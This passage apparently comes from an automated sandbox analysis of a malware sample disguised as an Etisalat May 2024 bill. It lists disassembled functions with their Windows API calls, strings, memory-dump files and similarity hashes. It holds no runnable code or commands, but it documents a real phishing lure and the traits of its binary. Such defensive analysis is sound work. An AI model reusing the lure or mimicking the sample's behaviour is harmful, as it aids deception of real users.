                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 81ee3eda93b909924ab318a65a13a200c35179fb6e49b9d29325945a874c9d28
                                      • Instruction ID: 9306f647c2ac000d55a6563dd723aacdf1187d74dd40dcb46574491f3a4399e7
                                      • Opcode Fuzzy Hash: 81ee3eda93b909924ab318a65a13a200c35179fb6e49b9d29325945a874c9d28
                                      • Instruction Fuzzy Hash: CD21F470900244BFCF04AB60CCC5EFEBBB5EF45300F1041A5B661972A2DFB99919DB20
                                      Function 00BB955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BB95DF
                                      • GetDlgCtrlID.USER32 ref: 00BB95EA
                                      • GetParent.USER32 ref: 00BB9606
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BB9609
                                      • GetDlgCtrlID.USER32(?), ref: 00BB9612
                                      • GetParent.USER32(?), ref: 00BB962E
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BB9631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: a61e7818a717a26b5ae97bc032b0f2b37f9d61a2167c841fd118331ef731d942
                                      • Instruction ID: f30e00c81f160455b545e83444ba6c2ce0e8846955a7a17b2dade915232eb324
                                      • Opcode Fuzzy Hash: a61e7818a717a26b5ae97bc032b0f2b37f9d61a2167c841fd118331ef731d942
                                      • Instruction Fuzzy Hash: 6221D371900244BFDF00ABA4CCD5EFEBBB9EF48300F1041A5FA52971A1DBB99919DA20
                                      Function 00BB9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 00BB9651
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00BB9666
                                      • _wcscmp.LIBCMT ref: 00BB9678
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BB96F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: 22f597774f1ed2c1ee287b876654b429c2ad0e33b44149a4687ddcff2f84a03d
                                      • Instruction ID: 1ca970aab0ac49645c2dcaba6c023cbff58ea13b02997db27d9424ef2ffa8f1d
                                      • Opcode Fuzzy Hash: 22f597774f1ed2c1ee287b876654b429c2ad0e33b44149a4687ddcff2f84a03d
                                      • Instruction Fuzzy Hash: 1211E376248347BBFB013620DC5ADF677DCCB06B60B2001A6FA05B50E1FEE169509A58
                                      Function 00BD8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BD8BEC
                                      • CoInitialize.OLE32(00000000), ref: 00BD8C19
                                      • CoUninitialize.OLE32 ref: 00BD8C23
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00BD8D23
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BD8E50
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BF2C0C), ref: 00BD8E84
                                      • CoGetObject.OLE32(?,00000000,00BF2C0C,?), ref: 00BD8EA7
                                      • SetErrorMode.KERNEL32(00000000), ref: 00BD8EBA
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BD8F3A
                                      • VariantClear.OLEAUT32(?), ref: 00BD8F4A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: 92a6bc4890abd5eb26c4e4626fd651e3c3653e7891a4e69195a41a628272b39d
                                      • Instruction ID: e58976bf01c9209e634a663c894e6c787bbc12e18fa111e97107b36b56056b95
                                      • Opcode Fuzzy Hash: 92a6bc4890abd5eb26c4e4626fd651e3c3653e7891a4e69195a41a628272b39d
                                      • Instruction Fuzzy Hash: D7C11571608305AFC700DF68C88492AB7E9FF89749F0449AEF5899B361EB71ED05CB52
                                      Function 00BC4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 00BC419D
                                      • __swprintf.LIBCMT ref: 00BC41AA
                                        • Part of subcall function 00B838D8: __woutput_l.LIBCMT ref: 00B83931
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00BC41D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 00BC41E0
                                      • LockResource.KERNEL32(00000000), ref: 00BC41ED
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00BC420D
                                      • LoadResource.KERNEL32(?,00000000), ref: 00BC421F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00BC422E
                                      • LockResource.KERNEL32(?), ref: 00BC423A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00BC429B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                      • String ID:
                                      • API String ID: 1433390588-0
                                      • Opcode ID: 2ec26d62cb3c224fa36d53bb6cc27ecedf8ec9a47c3570fd0f3ea0001b08c101
                                      • Instruction ID: fa980bd1889c612f9810547f1bff7959373e51fb10104f9d61437250d6e71106
                                      • Opcode Fuzzy Hash: 2ec26d62cb3c224fa36d53bb6cc27ecedf8ec9a47c3570fd0f3ea0001b08c101
                                      • Instruction Fuzzy Hash: 56319D71A0124AABCB119F60DC99FBFBBE8EF08301F044569F901EA150DB30DA51CBA0
                                      Function 00BC16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00BC1700
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1714
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00BC171B
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC172A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BC173C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1755
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC1767
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17AC
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17C1
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BC0778,?,00000001), ref: 00BC17CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 99a7cc7e5a5055823e1ada32383fc936b4e40c475d0a7363fcddc158cdcc53b6
                                      • Instruction ID: 3dabd6d67f10ba9f27ff22a3c2f51555bc7a2940a2554261e6fae416328f421c
                                      • Opcode Fuzzy Hash: 99a7cc7e5a5055823e1ada32383fc936b4e40c475d0a7363fcddc158cdcc53b6
                                      • Instruction Fuzzy Hash: 6631C0B1214204AFDB219F98DDC8F7937E9EB46711F1044AAF800EB2A1DF709D40CB60
                                      Function 00B6FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B6FC06
                                      • OleUninitialize.OLE32(?,00000000), ref: 00B6FCA5
                                      • UnregisterHotKey.USER32(?), ref: 00B6FDFC
                                      • DestroyWindow.USER32(?), ref: 00BA4A00
                                      • FreeLibrary.KERNEL32(?), ref: 00BA4A65
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BA4A92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 4fd7ec217fe220e5242aae718464bd281ff26c9d6f0195fb4cebf318753d95fa
                                      • Instruction ID: 7078043bcafa164b2d851a9c65e645c1aab08777fbb5a0f70464099658212fef
                                      • Opcode Fuzzy Hash: 4fd7ec217fe220e5242aae718464bd281ff26c9d6f0195fb4cebf318753d95fa
                                      • Instruction Fuzzy Hash: A7A165317062128FCB29EF54D895A79F7E4EF45700F1482EDE80AAB262CB74AD16CF54
                                      Function 00BBA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumChildWindows.USER32(?,00BBAA64), ref: 00BBA9A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 04d24ea354e8b5ff381e81ecf751157d0c2bfb35c807c9526f0e7b8ca637ddc1
                                      • Instruction ID: 0c132be0842c2159b7a6b946f9a611a3a1c10ff3d4f0ad2e607d6b737c0bf203
                                      • Opcode Fuzzy Hash: 04d24ea354e8b5ff381e81ecf751157d0c2bfb35c807c9526f0e7b8ca637ddc1
                                      • Instruction Fuzzy Hash: DA91B470A00106EBDB58EF60C491BF9FBF5FF04344F1081A9E899A7151DF706A99DBA1
                                      Function 00B62E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 00B62EAE
                                        • Part of subcall function 00B61DB3: GetClientRect.USER32(?,?), ref: 00B61DDC
                                        • Part of subcall function 00B61DB3: GetWindowRect.USER32(?,?), ref: 00B61E1D
                                        • Part of subcall function 00B61DB3: ScreenToClient.USER32(?,?), ref: 00B61E45
                                      • GetDC.USER32 ref: 00B9CF82
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B9CF95
                                      • SelectObject.GDI32(00000000,00000000), ref: 00B9CFA3
                                      • SelectObject.GDI32(00000000,00000000), ref: 00B9CFB8
                                      • ReleaseDC.USER32(?,00000000), ref: 00B9CFC0
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B9D04B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 3f70f0bcdb41043d6c6f870fcdca46d7b32f9372bd428d50403f93c102292108
                                      • Instruction ID: 491e6e9ee7e6d06bf206361787156b7ebaf485e34099853298e86fabcd4eae16
                                      • Opcode Fuzzy Hash: 3f70f0bcdb41043d6c6f870fcdca46d7b32f9372bd428d50403f93c102292108
                                      • Instruction Fuzzy Hash: E071A031500205DFDF218F64C894ABA7BF6FF49360F1482FAED559A2A6C7368C46DB60
                                      Function 00BEC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                        • Part of subcall function 00B62344: GetCursorPos.USER32(?), ref: 00B62357
                                        • Part of subcall function 00B62344: ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00BEC2E4
                                      • ImageList_EndDrag.COMCTL32 ref: 00BEC2EA
                                      • ReleaseCapture.USER32 ref: 00BEC2F0
                                      • SetWindowTextW.USER32(?,00000000), ref: 00BEC39A
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BEC3AD
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00BEC48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: 98aba5b5a3c7c6ae4e46cf286359f6b4bc348ff0e5403d1c565deccf501d886c
                                      • Instruction ID: 2c1e703587d752368fbefc4790ebdd6aefa576005785c9889abee2174e220479
                                      • Opcode Fuzzy Hash: 98aba5b5a3c7c6ae4e46cf286359f6b4bc348ff0e5403d1c565deccf501d886c
                                      • Instruction Fuzzy Hash: 6051AC70204385AFDB10EF24CC95F6A7BE5FB88310F00866DF5958B2E2CB35A955CB62
                                      Function 00BD8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BEF910), ref: 00BD903D
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BEF910), ref: 00BD9071
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BD91EB
                                      • SysFreeString.OLEAUT32(?), ref: 00BD9215
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: e93380e0486c3776e709cca6e76c931de90c167c3d762a81a55b5dc49563fc8e
                                      • Instruction ID: dcbfaa59fd5e975f3fda99d1ceaa4e8a0c7cff6135766937d887785209fa8e77
                                      • Opcode Fuzzy Hash: e93380e0486c3776e709cca6e76c931de90c167c3d762a81a55b5dc49563fc8e
                                      • Instruction Fuzzy Hash: 3CF13E71A00209EFDF04DF94C888EAEB7B9FF49315F10859AF515AB291DB31AE46CB50
                                      Function 00BDF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BDF9C9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFB5C
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFB80
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFBC0
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BDFBE2
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BDFD5E
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BDFD90
                                      • CloseHandle.KERNEL32(?), ref: 00BDFDBF
                                      • CloseHandle.KERNEL32(?), ref: 00BDFE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: b96ec8cf06d9ddae2e0ae65a5831a55f9c006696727c6166b6fa4b19df7afd89
                                      • Instruction ID: e63b977b8e5429c18d7624a26e408b023bf35367698dc55285a5d71bd0120cdc
                                      • Opcode Fuzzy Hash: b96ec8cf06d9ddae2e0ae65a5831a55f9c006696727c6166b6fa4b19df7afd89
                                      • Instruction Fuzzy Hash: 42E184311083429FC714EF24C891A7ABBE5EF84354F1485AEF89A8B3A2DB31DC45CB52
                                      Function 00BC4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BC38D3,?), ref: 00BC48C7
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BC38D3,?), ref: 00BC48E0
                                        • Part of subcall function 00BC4CD3: GetFileAttributesW.KERNEL32(?,00BC3947), ref: 00BC4CD4
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00BC4FE2
                                      • _wcscmp.LIBCMT ref: 00BC4FFC
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC5017
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: abac2176a0468fe0ca227c644aa1150986b1c7bf6bbdd81499d553df60a4f750
                                      • Instruction ID: c9203726f32903290d13975cd57967b108a974e8a6140aba31572e6d90340ac2
                                      • Opcode Fuzzy Hash: abac2176a0468fe0ca227c644aa1150986b1c7bf6bbdd81499d553df60a4f750
                                      • Instruction Fuzzy Hash: 885152B20087859BC724EB50C891EDFB3ECEF84341F10496EB589D7152EF74A688C766
                                      Function 00BE88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BE896E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 5a8d30bb49f1c87da949546c4e6d8d34cf8050fcc0b0efc159061af4e6fc3042
                                      • Instruction ID: 6770ee9b30008e57a43179d72f9f48051026357fbc559b13509f9931ae59132c
                                      • Opcode Fuzzy Hash: 5a8d30bb49f1c87da949546c4e6d8d34cf8050fcc0b0efc159061af4e6fc3042
                                      • Instruction Fuzzy Hash: A051B330500A85BFEF209F26DC85B693BE5FB04310F6055A6F919E65E1DF71A980CB51
                                      Function 00B62B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B9C547
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B9C569
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B9C581
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B9C59F
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B9C5C0
                                      • DestroyIcon.USER32(00000000), ref: 00B9C5CF
